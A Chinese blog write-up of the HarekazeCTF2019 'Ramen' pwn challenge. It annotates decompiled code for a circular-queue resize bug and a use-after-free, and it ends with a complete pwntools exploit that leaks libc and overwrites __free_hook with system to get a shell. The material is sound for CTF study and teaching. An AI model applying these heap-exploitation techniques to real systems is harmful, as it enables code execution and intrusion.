[BUUCTF-pwn] [HarekazeCTF2019]Ramen

最新推荐文章于 2024-09-11 13:41:53 发布
最新推荐文章于 2024-09-11 13:41:53 发布
阅读量1k 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122449763
版权

看exp再慢慢消化。逻辑错造成的指针溢出。

这个题虽然有UAF但是利用起来很困难,本来不想看那么长的程序,没办法看程序再看了exp后才明白。

程序分主程序和order,serv,change 三个函数,主程序没啥内容,但是循环队列的指针v4放在这了。v4依次表示队列块指针,头id,尾id和总长度。

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  int v3; // eax
  char v4[24]; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  sub_B34(a1, a2, a3);
  sub_D2F((__int64)v4);
  puts("Welcome to Harekaze Ramen Shop!!");
  while ( 1 )
  {
    v3 = menu();
    switch ( v3 )
    {
      case 2:
        m2serve(v4);                            // 输出并free name
        break;
      case 3:
        m3change(v4);                           // 改变窗口大小 2** 最大31
        break;
      case 1:
        m1order(v4);                            // 订单
        break;
    }
  }
}

order就是新增订单:

内容有点长,然后一点点加注释也就明白了。每次加订单会在尾指针处写入订单信息,然后尾指针后移(空尾)。

unsigned __int64 __fastcall sub_11A3(__int64 a1)
{
  _QWORD *v1; // rcx
  __int64 v2; // rdx
  void *v3; // rdx
  int v5; // [rsp+1Ch] [rbp-44h]
  __int64 v6; // [rsp+20h] [rbp-40h]
  __int64 v7; // [rsp+28h] [rbp-38h]
  __int64 v8; // [rsp+30h] [rbp-30h]
  __int64 v9[2]; // [rsp+38h] [rbp-28h] BYREF
  void *s; // [rsp+48h] [rbp-18h]
  unsigned __int64 v11; // [rsp+58h] [rbp-8h]

  v11 = __readfsqword(0x28u);
  if ( (*(_DWORD *)(a1 + 12) + *(_DWORD *)(a1 + 16) - *(_DWORD *)(a1 + 8)) % *(_DWORD *)(a1 + 16) == *(_DWORD *)(a1 + 16) - 1 )
  {
    puts("Seats are full.");                    // end+total - (end%total) == total -1 :空间满
  }
  else
  {
    v5 = sub_CC8();
    if ( v5 > 0 && v5 <= 5 )                    // 用哪个串无意义,pork的位置伪造chunk头
    {
      memset(v9, 0, sizeof(v9));
      strcpy((char *)v9, &aSoySauce[16 * v5 - 16]);
      printf("How many eggs? ");
      v6 = getnum();
      printf("How many grilled pork? ");
      v7 = getnum();
      printf("How many bamboo shoots? ");
      v8 = getnum();
      printf("If you want other toppings, put them down: ");
      s = malloc(0x20uLL);
      memset(s, 0, 0x20uLL);
      readstr(s, 32LL);
      v1 = (_QWORD *)(48LL * *(int *)(a1 + 12) + *(_QWORD *)a1);// 在空尾写入,尾指针+1
      *v1 = v6;
      v1[1] = v7;
      v2 = v9[0];
      v1[2] = v8;
      v1[3] = v2;
      v3 = s;
      v1[4] = v9[1];
      v1[5] = v3;
      *(_DWORD *)(a1 + 12) = (*(_DWORD *)(a1 + 12) + 1) % *(_DWORD *)(a1 + 16);// 更新尾指针 尾 = (尾+1)%total
      puts("Done.");
    }
    else
    {
      puts("Invalid choice.");
    }
  }
  return __readfsqword(0x28u) ^ v11;
}

serve是处理订单:

这里引入的名字块会被free但指针保留,不过这个指针由于头指针已经发生变化,这个不能直接用。

int __fastcall m2serve(__int64 a1)
{
  __int64 v2; // [rsp+18h] [rbp-8h]

  if ( *(_DWORD *)(a1 + 8) == *(_DWORD *)(a1 + 12) )// 头==尾, 队列空
    return puts("No order remains.");
  v2 = *(_QWORD *)a1 + 48LL * *(int *)(a1 + 8); // 输出头块
  *(_DWORD *)(a1 + 8) = (*(_DWORD *)(a1 + 8) + 1) % *(_DWORD *)(a1 + 16);// 指针后移
  printf("Serving %s Ramen...\n", (const char *)(v2 + 24));
  printf("Eggs: %d\n", (unsigned int)*(_QWORD *)v2);
  printf("Grilled pork: %d\n", (unsigned int)*(_QWORD *)(v2 + 8));
  printf("Bamboo shoots: %d\n", (unsigned int)*(_QWORD *)(v2 + 16));
  printf("Other toppings: %s\n", *(const char **)(v2 + 40));
  free(*(void **)(v2 + 40));  // 删除头块对应堆块,但不删除指针,当指针错误地指向删除块时可使用UAF
  return puts("Done.");
}

第3个change是变更队列空间:

并调用变大和变小两个函数。>=时调用变大,由于=时也会调用变大,漏洞就出来了。

当变大里会把原数据重复制一下,这里有个漏洞:当新空间与原空间相同时也会执行尾部后移操作,这样尾部就移出了空间造成溢出。通过移出的这个块写size为指定值来覆盖原chunk在释放时会将块数据部分改为unsortbin的fd,bk指针。

int __fastcall m3change(_DWORD *a1)
{
  int v2; // [rsp+18h] [rbp-8h]
  int v3; // [rsp+1Ch] [rbp-4h]

  printf("Number of seats: ");
  v2 = getnum() + 1;
  if ( v2 <= 1 || v2 > 32 )
    return puts("Invalid input.");
  v3 = getbitord(v2);
  if ( v2 >= a1[4] )
  {
    change_big((__int64)a1, v3);                // 原大小是8,最大可变成32(2**5)realloc
  }
  else
  {
    if ( v2 <= (a1[3] + a1[4] - a1[2]) % a1[4] )// 新大小不能小于已有订单数
      return printf("Less than the number of remaining orders.");
    chanage_small((__int64)a1, v3);             // realloc 清空无用订单,缩小块
  }
  return puts("Done.");
}
__int64 __fastcall change_big(__int64 a1, int a2)
{
  __int64 result; // rax
  _QWORD *v3; // rsi
  _QWORD *v4; // rcx
  __int64 v5; // rdx
  __int64 v6; // rdx
  __int64 v7; // rdx
  _QWORD *v8; // rsi
  _QWORD *v9; // rcx
  __int64 v10; // rdx
  __int64 v11; // rdx
  __int64 v12; // rdx
  int j; // [rsp+18h] [rbp-18h]
  int i; // [rsp+1Ch] [rbp-14h]
  unsigned int i_head; // [rsp+20h] [rbp-10h]
  int i_tail; // [rsp+24h] [rbp-Ch]
  int i_total; // [rsp+28h] [rbp-8h]
  int i_add; // [rsp+2Ch] [rbp-4h]
                                                // 当size不变时也会进入此函数
  i_head = *(_DWORD *)(a1 + 8);                 // 头
  i_tail = *(_DWORD *)(a1 + 12);                // 尾
  i_total = *(_DWORD *)(a1 + 16);               // 总数
  *(_QWORD *)a1 = realloc(*(void **)a1, 48LL * a2);// 扩大原块
  *(_DWORD *)(a1 + 16) = a2;                    // total = 新大小
  result = i_head;
  if ( (int)i_head > i_tail )                   // 头在尾前  ooT....Hoo
  {
    if ( i_tail >= (int)(i_total - i_head) )    // 尾一半大于头一半
    {
      i_add = a2 - i_total;                     // 增加的空间块数
      for ( i = i_head; i < i_total; ++i )      // 将头块后移到尾  [ooT...Ho]->[ooT...XXXXXXXXHo]
      {
        v8 = (_QWORD *)(*(_QWORD *)a1 + 48LL * i);
        v9 = (_QWORD *)(48LL * (i + i_add) + *(_QWORD *)a1);
        v10 = v8[1];
        *v9 = *v8;
        v9[1] = v10;
        v11 = v8[3];
        v9[2] = v8[2];
        v9[3] = v11;
        v12 = v8[5];
        v9[4] = v8[4];
        v9[5] = v12;
      }
      result = a1;
      *(_DWORD *)(a1 + 8) += i_add;
    }
    else
    {
      for ( j = 0; j < i_tail; ++j )            // 头半块大,尾半块小[oT...Hoo]->[XX...HoooTXXXXX]
      {                                         // 当size不变时,这里会把尾部向后复制,溢出数据区
        v3 = (_QWORD *)(*(_QWORD *)a1 + 48LL * j);
        v4 = (_QWORD *)(48LL * (j + i_total) + *(_QWORD *)a1);
        v5 = v3[1];
        *v4 = *v3;
        v4[1] = v5;
        v6 = v3[3];
        v4[2] = v3[2];
        v4[3] = v6;
        v7 = v3[5];
        v4[4] = v3[4];
        v4[5] = v7;
      }
      result = a1;
      *(_DWORD *)(a1 + 12) += i_total;
    }
  }
  return result;
}
__int64 __fastcall chanage_small(__int64 a1, int new_size)
{
  _QWORD *v2; // rsi
  _QWORD *v3; // rcx
  __int64 v4; // rdx
  __int64 v5; // rdx
  __int64 v6; // rdx
  _QWORD *v7; // rsi
  _QWORD *v8; // rcx
  __int64 v9; // rdx
  __int64 v10; // rdx
  __int64 v11; // rdx
  _QWORD *v12; // rsi
  _QWORD *v13; // rcx
  __int64 v14; // rdx
  __int64 v15; // rdx
  __int64 v16; // rdx
  __int64 result; // rax
  int v18; // [rsp+4h] [rbp-2Ch]
  int k; // [rsp+14h] [rbp-1Ch]
  int j; // [rsp+18h] [rbp-18h]
  int i; // [rsp+1Ch] [rbp-14h]
  int i_head; // [rsp+20h] [rbp-10h]
  int i_tail; // [rsp+24h] [rbp-Ch]
  int i_total; // [rsp+28h] [rbp-8h]
  int v25; // [rsp+2Ch] [rbp-4h]

  v18 = new_size;
  i_head = *(_DWORD *)(a1 + 8);                 // 头
  i_tail = *(_DWORD *)(a1 + 12);                // 尾
  i_total = *(_DWORD *)(a1 + 16);               // 总数
  if ( i_tail >= i_head )                       // [...HoooT..]
  {
    if ( i_head < new_size )
    {
      if ( i_tail >= new_size )                 // [...Hoo|oT....]-> [oT.Hoo]XXXXXXXX
      {
        for ( i = new_size; i < i_tail; ++i )
        {
          v12 = (_QWORD *)(*(_QWORD *)a1 + 48LL * i);
          v13 = (_QWORD *)(48LL * (i - v18) + *(_QWORD *)a1);
          v14 = v12[1];
          *v13 = *v12;
          v13[1] = v14;
          v15 = v12[3];
          v13[2] = v12[2];
          v13[3] = v15;
          v16 = v12[5];
          v13[4] = v12[4];
          v13[5] = v16;
        }
        *(_DWORD *)(a1 + 12) -= v18;
      }
    }
    else                                        // [........|.HoooT..] -> [HoooT...]XXXXXXXX
    {
      for ( j = *(_DWORD *)(a1 + 8); j < i_tail; ++j )
      {
        v7 = (_QWORD *)(*(_QWORD *)a1 + 48LL * j);
        v8 = (_QWORD *)(48LL * (j - i_head) + *(_QWORD *)a1);
        v9 = v7[1];
        *v8 = *v7;
        v8[1] = v9;
        v10 = v7[3];
        v8[2] = v7[2];
        v8[3] = v10;
        v11 = v7[5];
        v8[4] = v7[4];
        v8[5] = v11;
      }
      *(_DWORD *)(a1 + 12) -= *(_DWORD *)(a1 + 8);
      *(_DWORD *)(a1 + 8) = 0;
    }
  }
  else                                          // 尾在前  [oT......|.....Hoo]->[oT...Hoo]XXXXXXXX
  {
    v25 = i_total - new_size;
    for ( k = *(_DWORD *)(a1 + 8); k < i_total; ++k )
    {
      v2 = (_QWORD *)(*(_QWORD *)a1 + 48LL * k);
      v3 = (_QWORD *)(48LL * (k - v25) + *(_QWORD *)a1);
      v4 = v2[1];
      *v3 = *v2;
      v3[1] = v4;
      v5 = v2[3];
      v3[2] = v2[2];
      v3[3] = v5;
      v6 = v2[5];
      v3[4] = v2[4];
      v3[5] = v6;
    }
    *(_DWORD *)(a1 + 8) -= v25;
  }
  *(_QWORD *)a1 = realloc(*(void **)a1, 48LL * v18);
  result = a1;
  *(_DWORD *)(a1 + 16) = v18;
  return result;
}

利用有两次:

第一次先对原始空间扩大再缩小将多余部分放入unsort,再新增订单时会从这个unsort里分配,将块分布写成[T...Ho],这个块在change原大小时尾部的fork会被覆盖size在释放时被放入第2个unsort。再通过缩小块将块进行整理,将块数据复制到正常位置,serv时将其打印出来,得到libc。

第二次先将空间调回8,由于原空间大小不够会从第1个unsort里分配,同样将块写成头大尾小的样子在同大小change里将尾放到超过总长度的位置。这时候头是7,尾是8(占第9格)总数是8,当释放时将释放7,0,1...这样前边块里未清空的相同的指针被多次释放形成loop,利用这个loop新建块写system到_free_hook上。

 原exp:

from pwn import *
'''
struct{egg:8,pork:8,shoots:8,flavor:16,ptr->topping}
gef➤  x/3wx 0x00007fffffffdf88 rsp+8,+12,+16
0x7fffffffdf88:	0x00000000	0x00000003	0x00000008
                start       end         total
'''
def order(toppings=b'A', eggs=0, porks=0, bamboo_shoots=0, flavor=1):
    s.sendlineafter(b'Choice: ', b'1')
    s.sendlineafter(b'Choice: ', str(flavor).encode())
    s.sendlineafter(b'eggs? ', str(eggs).encode())
    s.sendlineafter(b'pork? ', str(porks).encode())
    s.sendlineafter(b'shoots? ', str(bamboo_shoots).encode())
    s.sendafter(b'down: ', toppings)

def serve():
    s.sendlineafter(b'Choice: ', b'2')
    s.recvuntil(b'Serving ')
    name = s.recvuntil(b' ')[:-1]
    s.recvuntil(b'Eggs: ')
    eggs = int(s.recvline(False))
    s.recvuntil(b'pork: ')
    porks = int(s.recvline(False))
    s.recvuntil(b'shoots: ')
    bamboo_shoots = int(s.recvline(False))
    s.recvuntil(b'toppings: ')
    toppings = s.recvline(False)
    return name, eggs, porks, bamboo_shoots, toppings

def change(num):
    s.sendlineafter(b'Choice: ', b'3')
    s.sendlineafter(b'seats: ', str(num).encode())

local = 1
if local == 1:
    s = process('./pwn')
    libc = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
else:
    s = remote('node4.buuoj.cn', 28253)
    libc = ELF('../libc6_2.27-3ubuntu1_amd64.so')

change(0x1f) # chunk0 0x190->0x610
for i in range(6):  #add chunk 0x30 *6
    order()
change(7) #chunk0 0x610->0x190  unsortbin 0x480
order() ##7 0x30 from 0x480
serve() #free #0
order() #add #0 head 0x30 pre_inuse=0
serve() #free #1
order(b'A', 0, 0x4b1) # #0
change(7) #chunk7 head = 0x4b1 chunk6->3f0 unsort 0x3e0 0x4b0
for i in range(5):
    serve()
change(3)

serve()
libc_base = u64(serve()[0].ljust(8, b'\0')) - 0x60 -0x10 - libc.sym['__malloc_hook']
log.info('libc base: %#x' % libc_base)

change(7)
pause()

for i in range(0xd):
    order()
    serve()

order()
change(7)
for i in range(3):
    serve()
change(0xf)

order(p64(libc_base + libc.symbols['__free_hook']))
order(b'/bin/sh\0')
order(p64(libc_base + libc.symbols['system']))
serve()
s.interactive()

石氏是时试
关注
专栏目录
[BUGKU] [PWN] PWN5
Stan冲冲冲
05-18 409
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行一次都会变) 在windows里把pwn2拉入64位ida 按F5切换到伪C 发现乱码,修改配置文件后ALT+A全部选上UTF-8,再按一次F5,中文就可以显示了 int __cdecl main(int argc, const char **argv, const char **envp) { char
BugkuCTF练习平台pwn5(human)的writeup
只影的博客
03-04 940
这道题的思路相对简单,但是比较有代表性。 首先查看防护机制,发现只打开了NX。用ida打开题目,发现中文无法识别为字符串。这里需要用命令行打开ida,新建bat并编辑内容为D:\IDA_Pro_v7.0\ida64.exe -dCULTURE=all human即可。 漏洞有两处,第一处比较明显,是格式化字符串漏洞,如下所示。 memset(&s, 0, 0x20uLL); put...
2022年新疆天山固网杯网络安全技能竞赛wp
onl_llo的博客
07-04 3955
天山固网杯wp
suctf2018-noend writeup
qq_39153421的博客
03-24 261
题目 保护全开,主函数很简单,发现malloc没有检查分配失败的情况,若分配失败会返回0,接可以伪造size-1实现任意地址末位写0,为利用提供了条件。 可以看到题目size>0x7f不会被free,小于0x7f就会被free掉。 while ( 1 ) { do { memset(s, 0, 0x20uLL); read(0, s, 0x1FuLL); size = strtoll(s, 0LL, 10); buf = mall
memset详解
nyist_yangguang的博客
01-27 4146
第一:memset函数按字节对内存块进行初始化,所以不能用它将int数组初始化为0和-1之外的其他值(除非该值高字节和低字节相同)。 第二:memset(void *s, int ch,size_t n);中ch实际范围应该在0~~255,因为该函数只能取ch的后八位赋值给你所输入的范围的每个字节,比如int a[5]赋值memset(a,-1,sizeof(int )*5)与memset(a,511,sizeof(int )*5) 所赋值的结果是一样的都为-1;因为-1的二进制码为(11111111 1
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2594
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1685
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 984
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
[BUUCTF-pwn] 26-pwn4
weixin_52640415的博客
02-16 261
后边这两个都是格式化字符串漏洞,而且一看就是。不过都作了些限制。printf漏洞原则上可以写到任意位置也可以漏洞任意位置。这个难度就在于怎么绕过限制。 这题限制比较简单:长度只有32字节。 unsigned __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s[24]; // [rsp+0h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+18h] [rbp-8h]
[Bash]Shellshock
qq_43801002的博客
04-27 317
#讲在前面 对于shellshock漏洞,还是必须要补充一些点的 网上对于这个漏洞的复现教程所剩无几,可能是因为破坏力实在太大,且易于实施。 2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功...
BUUCTF pwn 四月刷题
coco的博客
04-07 859
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
[XCTF-pwn] 12-secret_file
weixin_52640415的博客
03-03 141
一个简单的内存溢出覆盖的题,要求输入数据与md5值比较通过,然后执行预存的命令。这里输入数据有溢出,通过溢出覆盖到v14命令和v15的md5值。 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8
Asis CTF 2015-Car_Market
weixin_30657999的博客
10-29 132
恰好找到了这道题的bin文件,就来做一下。 这道题目是一个经典的选单程序但是具有三级选单,在bss段存在指针数组ptr,ptr中的值指向每个主结构,其中主结构如下所示。 [16] model [4] price [4] padding; [8] pointer共32byte 其中pointer会指向一个子结构customer [32] first_name...
BUUCTF:[HarekazeCTF2019]Easy Notes
末初的CSDN博客
07-24 1729
BUUCTF:[HarekazeCTF2019]Easy Notes
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 858
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
SSHamble:一款针对SSH技术安全的研究与分析工具
最新发布
FreeBuf_的博客
09-11 1007
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值